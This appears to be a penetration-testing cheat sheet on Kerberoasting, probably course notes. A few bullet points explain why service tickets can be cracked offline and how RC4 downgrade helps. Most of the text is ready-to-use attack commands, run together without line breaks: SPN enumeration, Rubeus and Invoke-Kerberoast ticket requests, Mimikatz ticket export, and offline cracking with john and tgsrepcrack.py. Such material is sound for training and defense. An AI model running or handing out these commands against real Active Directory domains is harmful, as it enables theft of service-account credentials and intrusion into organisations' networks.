- Offline cracking of service account passwords.
- The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.
- Because (non-machine) service account passwords are not frequently changed, this is a good attack vector.
- An important point to note is that we need a service ticket that is encrypted with an NTLM hash (RC4) and not AES, which uses a salt. Bruteforcing the AES key would be extremely difficult.
- The DC will, however, oblige to the client’s requests of using a ticket with downgraded encryption. Unless RC4 is disabled throughout the forest.
Obtaining tickets
Get-DomainUser -SPNGet-ADUser -Filter {ServicePrincipleName -ne "$null"} -Properties ServicePrincipalNameRubeus.exe kerberoast /statsRubeus.exe kerberoast /user:username /simpleInvoke-Kerberoast | select Hash | ConvertTo-CsvRubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:username /simple /rc4opsecRubeus.exe kerberoast /rc4opsec /outfile:hashes.txtCracking
john.exe --wordlist:C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txtMisc.
klist.exeInvoke-MimiKatz -Command '"kerberos::list /export"'python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt 'tgs_file_name.kirbi'